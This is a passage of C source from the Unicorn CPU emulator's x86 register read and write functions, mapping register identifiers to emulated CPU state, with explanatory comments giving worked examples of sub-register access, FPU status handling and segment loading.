READ_BYTE_L(env->regs[R_ECX]); break; case UC_X86_REG_EDX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EDX]; break; case UC_X86_REG_DX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDX]); break; case UC_X86_REG_DH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EDX]); break; case UC_X86_REG_DL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EDX]); break; case UC_X86_REG_ESP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_ESP]; break; case UC_X86_REG_SP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESP]); break; case UC_X86_REG_EBP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EBP]; break; case UC_X86_REG_BP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBP]); break; case UC_X86_REG_ESI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_ESI]; break; case UC_X86_REG_SI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESI]); break; case UC_X86_REG_EDI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EDI]; break; case UC_X86_REG_DI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDI]); break; case UC_X86_REG_EIP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->eip; break; case UC_X86_REG_IP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->eip); break; case UC_X86_REG_CS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_CS].selector; break; case UC_X86_REG_DS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_DS].selector; break; case UC_X86_REG_SS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_SS].selector; break; case UC_X86_REG_ES: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_ES].selector; break; case UC_X86_REG_FS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_FS].selector; break; case UC_X86_REG_GS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_GS].selector; break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->idt.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->idt.base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->gdt.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->gdt.base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->ldt.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->ldt.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->ldt.selector; ((uc_x86_mmr *)value)->flags = env->ldt.flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->tr.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->tr.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->tr.selector; ((uc_x86_mmr *)value)->flags = env->tr.flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_read(env, (uc_x86_msr *)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->mxcsr; break; case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = (uint32_t)env->segs[R_FS].base; break; } break; #ifdef TARGET_X86_64 case UC_MODE_64: switch (regid) { default: break; case UC_X86_REG_CR0: case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: case UC_X86_REG_CR4: CHECK_REG_TYPE(int64_t); *(int64_t *)value = env->cr[regid - UC_X86_REG_CR0]; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case 
UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(int64_t); *(int64_t *)value = env->dr[regid - UC_X86_REG_DR0]; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_RFLAGS: CHECK_REG_TYPE(int64_t); *(int64_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_RAX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EAX]; break; case UC_X86_REG_EAX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EAX]); break; case UC_X86_REG_AX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EAX]); break; case UC_X86_REG_AH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EAX]); break; case UC_X86_REG_AL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EAX]); break; case UC_X86_REG_RBX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EBX]; break; case UC_X86_REG_EBX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EBX]); break; case UC_X86_REG_BX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBX]); break; case UC_X86_REG_BH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EBX]); break; case UC_X86_REG_BL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EBX]); break; case UC_X86_REG_RCX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_ECX]; break; case UC_X86_REG_ECX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_ECX]); break; case UC_X86_REG_CX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ECX]); break; case UC_X86_REG_CH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_ECX]); break; case UC_X86_REG_CL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_ECX]); break; case UC_X86_REG_RDX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EDX]; break; case UC_X86_REG_EDX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EDX]); break; case UC_X86_REG_DX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDX]); break; case UC_X86_REG_DH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EDX]); break; case UC_X86_REG_DL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EDX]); break; case UC_X86_REG_RSP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_ESP]; break; case UC_X86_REG_ESP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_ESP]); break; case UC_X86_REG_SP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESP]); break; case UC_X86_REG_SPL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_ESP]); break; case UC_X86_REG_RBP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EBP]; break; case UC_X86_REG_EBP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EBP]); break; case UC_X86_REG_BP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBP]); break; case UC_X86_REG_BPL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EBP]); break; case UC_X86_REG_RSI: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_ESI]; break; case UC_X86_REG_ESI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_ESI]); break; case UC_X86_REG_SI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESI]); 
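/*
 * Worked example of the sub-register accessors used throughout this
 * switch. READ_DWORD/READ_WORD/READ_BYTE_H/READ_BYTE_L are defined
 * elsewhere in Unicorn; the values below show their intended effect
 * (plain masking, no sign extension), not the literal macro bodies:
 *
 *     env->regs[R_EAX] = 0x1122334455667788;       // RAX
 *     READ_DWORD(env->regs[R_EAX])  // -> 0x55667788, EAX (low 32 bits)
 *     READ_WORD(env->regs[R_EAX])   // -> 0x7788,     AX  (low 16 bits)
 *     READ_BYTE_H(env->regs[R_EAX]) // -> 0x77,       AH  (bits 8..15)
 *     READ_BYTE_L(env->regs[R_EAX]) // -> 0x88,       AL  (bits 0..7)
 */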
break; case UC_X86_REG_SIL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_ESI]); break; case UC_X86_REG_RDI: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EDI]; break; case UC_X86_REG_EDI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EDI]); break; case UC_X86_REG_DI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDI]); break; case UC_X86_REG_DIL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EDI]); break; case UC_X86_REG_RIP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->eip; break; case UC_X86_REG_EIP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->eip); break; case UC_X86_REG_IP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->eip); break; case UC_X86_REG_CS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_CS].selector; break; case UC_X86_REG_DS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_DS].selector; break; case UC_X86_REG_SS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_SS].selector; break; case UC_X86_REG_ES: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_ES].selector; break; case UC_X86_REG_FS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_FS].selector; break; case UC_X86_REG_GS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_GS].selector; break; case UC_X86_REG_R8: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[8]); break; case UC_X86_REG_R8D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[8]); break; case UC_X86_REG_R8W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[8]); break; case UC_X86_REG_R8B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[8]); break; case UC_X86_REG_R9: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[9]); break; case UC_X86_REG_R9D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[9]); break; case UC_X86_REG_R9W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[9]); break; case UC_X86_REG_R9B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[9]); break; case UC_X86_REG_R10: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[10]); break; case UC_X86_REG_R10D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[10]); break; case UC_X86_REG_R10W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[10]); break; case UC_X86_REG_R10B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[10]); break; case UC_X86_REG_R11: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[11]); break; case UC_X86_REG_R11D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[11]); break; case UC_X86_REG_R11W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[11]); break; case UC_X86_REG_R11B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[11]); break; case UC_X86_REG_R12: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[12]); break; case UC_X86_REG_R12D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[12]); break; case UC_X86_REG_R12W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[12]); break; case UC_X86_REG_R12B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[12]); break; case UC_X86_REG_R13: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[13]); break; case UC_X86_REG_R13D: 
CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[13]); break; case UC_X86_REG_R13W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[13]); break; case UC_X86_REG_R13B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[13]); break; case UC_X86_REG_R14: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[14]); break; case UC_X86_REG_R14D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[14]); break; case UC_X86_REG_R14W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[14]); break; case UC_X86_REG_R14B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[14]); break; case UC_X86_REG_R15: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[15]); break; case UC_X86_REG_R15D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[15]); break; case UC_X86_REG_R15W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[15]); break; case UC_X86_REG_R15B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[15]); break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->idt.limit; ((uc_x86_mmr *)value)->base = env->idt.base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->gdt.limit; ((uc_x86_mmr *)value)->base = env->gdt.base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->ldt.limit; ((uc_x86_mmr *)value)->base = env->ldt.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->ldt.selector; ((uc_x86_mmr *)value)->flags = env->ldt.flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->tr.limit; ((uc_x86_mmr *)value)->base = env->tr.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->tr.selector; ((uc_x86_mmr *)value)->flags = env->tr.flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_read(env, (uc_x86_msr *)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->mxcsr; break; case UC_X86_REG_XMM8: case UC_X86_REG_XMM9: case UC_X86_REG_XMM10: case UC_X86_REG_XMM11: case UC_X86_REG_XMM12: case UC_X86_REG_XMM13: case UC_X86_REG_XMM14: case UC_X86_REG_XMM15: { CHECK_REG_TYPE(float64[2]); float64 *dst = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; dst[0] = reg->ZMM_Q(0); dst[1] = reg->ZMM_Q(1); break; } case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = (uint64_t)env->segs[R_FS].base; break; case UC_X86_REG_GS_BASE: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = (uint64_t)env->segs[R_GS].base; break; } break; #endif } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUX86State *env = _env; uc_err ret = UC_ERR_ARG; switch (regid) { default: break; case UC_X86_REG_FP0: case UC_X86_REG_FP1: case UC_X86_REG_FP2: case UC_X86_REG_FP3: case UC_X86_REG_FP4: case UC_X86_REG_FP5: case UC_X86_REG_FP6: case UC_X86_REG_FP7: { CHECK_REG_TYPE(char[10]); uint64_t mant = *(uint64_t *)value; uint16_t upper = *(uint16_t *)((char *)value + sizeof(uint64_t)); env->fpregs[regid - UC_X86_REG_FP0].d = cpu_set_fp80(mant, upper); return ret; } case UC_X86_REG_FPSW: { CHECK_REG_TYPE(uint16_t); uint16_t fpus = *(uint16_t *)value; env->fpus = fpus & ~0x3800; env->fpstt = (fpus >> 11) & 0x7; return ret; } case UC_X86_REG_FPCW: CHECK_REG_TYPE(uint16_t); cpu_set_fpuc(env, *(uint16_t *)value); 
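/*
 * Worked example of the FPSW handling above: QEMU stores the x87
 * top-of-stack index separately in env->fpstt, so the architectural status
 * word is split on write and reassembled on read. TOP occupies FPSW bits
 * 11..13 (mask 0x3800):
 *
 *     uint16_t fpsw = 0x2801;            // IE set, TOP = 5
 *     env->fpus  = fpsw & ~0x3800;       // -> 0x0001
 *     env->fpstt = (fpsw >> 11) & 0x7;   // -> 5
 *     // the read side recombines: 0x0001 | (5 << 11) == 0x2801
 */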
return ret; case UC_X86_REG_FPTAG: { CHECK_REG_TYPE(uint16_t); int i; uint16_t fptag = *(uint16_t *)value; for (i = 0; i < 8; i++) { env->fptags[i] = ((fptag & 3) == 3); fptag >>= 2; } return ret; } case UC_X86_REG_XMM0: case UC_X86_REG_XMM1: case UC_X86_REG_XMM2: case UC_X86_REG_XMM3: case UC_X86_REG_XMM4: case UC_X86_REG_XMM5: case UC_X86_REG_XMM6: case UC_X86_REG_XMM7: { CHECK_REG_TYPE(float64[2]); float64 *src = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; reg->ZMM_Q(0) = src[0]; reg->ZMM_Q(1) = src[1]; return ret; } case UC_X86_REG_ST0: case UC_X86_REG_ST1: case UC_X86_REG_ST2: case UC_X86_REG_ST3: case UC_X86_REG_ST4: case UC_X86_REG_ST5: case UC_X86_REG_ST6: case UC_X86_REG_ST7: { CHECK_REG_TYPE(char[10]); memcpy(&FPST(regid - UC_X86_REG_ST0), value, 10); return ret; } case UC_X86_REG_YMM0: case UC_X86_REG_YMM1: case UC_X86_REG_YMM2: case UC_X86_REG_YMM3: case UC_X86_REG_YMM4: case UC_X86_REG_YMM5: case UC_X86_REG_YMM6: case UC_X86_REG_YMM7: case UC_X86_REG_YMM8: case UC_X86_REG_YMM9: case UC_X86_REG_YMM10: case UC_X86_REG_YMM11: case UC_X86_REG_YMM12: case UC_X86_REG_YMM13: case UC_X86_REG_YMM14: case UC_X86_REG_YMM15: { CHECK_REG_TYPE(float64[4]); float64 *src = (float64 *)value; ZMMReg *lo_reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_YMM0]; XMMReg *hi_reg = &env->ymmh_regs[regid - UC_X86_REG_YMM0]; lo_reg->ZMM_Q(0) = src[0]; lo_reg->ZMM_Q(1) = src[1]; // YMM is not supported by QEMU at all // As of qemu 5.0.1, ymmh_regs is nowhere used. hi_reg->_d[0] = src[2]; hi_reg->_d[1] = src[3]; return ret; } case UC_X86_REG_FIP: CHECK_REG_TYPE(uint64_t); env->fpip = *(uint64_t *)value; return ret; case UC_X86_REG_FCS: CHECK_REG_TYPE(uint16_t); env->fpcs = *(uint16_t *)value; return ret; case UC_X86_REG_FDP: CHECK_REG_TYPE(uint64_t); env->fpdp = *(uint64_t *)value; return ret; case UC_X86_REG_FDS: CHECK_REG_TYPE(uint16_t); env->fpds = *(uint16_t *)value; return ret; case UC_X86_REG_FOP: CHECK_REG_TYPE(uint16_t); env->fpop = *(uint16_t *)value; return ret; } switch (mode) { default: break; case UC_MODE_16: switch (regid) { default: break; case UC_X86_REG_ES: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_ES, *(uint16_t *)value); return ret; case UC_X86_REG_SS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_SS, *(uint16_t *)value); return ret; case UC_X86_REG_DS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_DS, *(uint16_t *)value); return ret; case UC_X86_REG_FS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_FS, *(uint16_t *)value); return ret; case UC_X86_REG_GS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_GS, *(uint16_t *)value); return ret; } // fall-thru case UC_MODE_32: switch (regid) { default: break; case UC_X86_REG_CR0: CHECK_REG_TYPE(uint32_t); cpu_x86_update_cr0(env, *(uint32_t *)value); goto write_cr; case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: CHECK_REG_TYPE(uint32_t); cpu_x86_update_cr3(env, *(uint32_t *)value); goto write_cr; case UC_X86_REG_CR4: CHECK_REG_TYPE(uint32_t); cpu_x86_update_cr4(env, *(uint32_t *)value); write_cr: env->cr[regid - UC_X86_REG_CR0] = *(uint32_t *)value; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(uint32_t); env->dr[regid - UC_X86_REG_DR0] = *(uint32_t *)value; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(uint16_t); cpu_load_eflags(env, *(uint16_t *)value, -1); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(uint32_t); 
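/*
 * The FLAGS/EFLAGS/RFLAGS writes here all funnel through QEMU's
 * cpu_load_eflags(); the -1 update mask asks it to take every maskable bit
 * from the supplied value, and it also resets the lazy-flags state so
 * later reads are consistent. Worked example with the standard x86 bit
 * masks:
 *
 *     value = 0x246
 *           = 0x200 (IF) | 0x40 (ZF) | 0x4 (PF) | 0x2 (reserved, always 1)
 *
 * after which cpu_compute_eflags(env) should read back 0x246.
 */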
cpu_load_eflags(env, *(uint32_t *)value, -1); break; case UC_X86_REG_EAX: CHECK_REG_TYPE(uint32_t); env->regs[R_EAX] = *(uint32_t *)value; break; case UC_X86_REG_AX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EAX], *(uint16_t *)value); break; case UC_X86_REG_AH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_AL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_EBX: CHECK_REG_TYPE(uint32_t); env->regs[R_EBX] = *(uint32_t *)value; break; case UC_X86_REG_BX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBX], *(uint16_t *)value); break; case UC_X86_REG_BH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EBX], *(uint8_t *)value); break; case UC_X86_REG_BL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EBX], *(uint8_t *)value); break; case UC_X86_REG_ECX: CHECK_REG_TYPE(uint32_t); env->regs[R_ECX] = *(uint32_t *)value; break; case UC_X86_REG_CX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ECX], *(uint16_t *)value); break; case UC_X86_REG_CH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_CL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_EDX: CHECK_REG_TYPE(uint32_t); env->regs[R_EDX] = *(uint32_t *)value; break; case UC_X86_REG_DX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDX], *(uint16_t *)value); break; case UC_X86_REG_DH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_DL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_ESP: CHECK_REG_TYPE(uint32_t); env->regs[R_ESP] = *(uint32_t *)value; break; case UC_X86_REG_SP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESP], *(uint16_t *)value); break; case UC_X86_REG_EBP: CHECK_REG_TYPE(uint32_t); env->regs[R_EBP] = *(uint32_t *)value; break; case UC_X86_REG_BP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBP], *(uint16_t *)value); break; case UC_X86_REG_ESI: CHECK_REG_TYPE(uint32_t); env->regs[R_ESI] = *(uint32_t *)value; break; case UC_X86_REG_SI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESI], *(uint16_t *)value); break; case UC_X86_REG_EDI: CHECK_REG_TYPE(uint32_t); env->regs[R_EDI] = *(uint32_t *)value; break; case UC_X86_REG_DI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDI], *(uint16_t *)value); break; case UC_X86_REG_EIP: CHECK_REG_TYPE(uint32_t); env->eip = *(uint32_t *)value; *setpc = 1; break; case UC_X86_REG_IP: CHECK_REG_TYPE(uint16_t); env->eip = *(uint16_t *)value; *setpc = 1; break; case UC_X86_REG_CS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_CS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_CS, *(uint16_t *)value); break; case UC_X86_REG_DS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_DS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_DS, *(uint16_t *)value); break; case UC_X86_REG_SS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_SS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_SS, *(uint16_t *)value); break; case UC_X86_REG_ES: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_ES, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_ES, *(uint16_t *)value); break; case UC_X86_REG_FS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); if (ret) { return ret; } 
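/*
 * In protected mode the selector writes above are validated against the
 * guest's descriptor tables (uc_check_cpu_x86_load_seg) before the load,
 * so a client must install a GDT first. A minimal client-side sketch using
 * only the public API (addresses and descriptor layout are illustrative):
 *
 *     uint64_t flat_data = 0x00cf92000000ffffULL;   // base 0, 4 GiB limit
 *     uc_x86_mmr gdtr = { .base = 0x1000, .limit = 8 * 8 - 1 };
 *     uint16_t sel = 0x08;                          // GDT slot 1, RPL 0
 *
 *     uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_READ | UC_PROT_WRITE);
 *     uc_mem_write(uc, 0x1000 + 8, &flat_data, sizeof(flat_data));
 *     uc_reg_write(uc, UC_X86_REG_GDTR, &gdtr);
 *     uc_reg_write(uc, UC_X86_REG_DS, &sel);        // now passes the check
 */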
cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); break; case UC_X86_REG_GS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); env->idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->idt.base = (uint32_t)((uc_x86_mmr *)value)->base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); env->gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->gdt.base = (uint32_t)((uc_x86_mmr *)value)->base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); env->ldt.limit = ((uc_x86_mmr *)value)->limit; env->ldt.base = (uint32_t)((uc_x86_mmr *)value)->base; env->ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->ldt.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); env->tr.limit = ((uc_x86_mmr *)value)->limit; env->tr.base = (uint32_t)((uc_x86_mmr *)value)->base; env->tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->tr.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_write(env, (uc_x86_msr 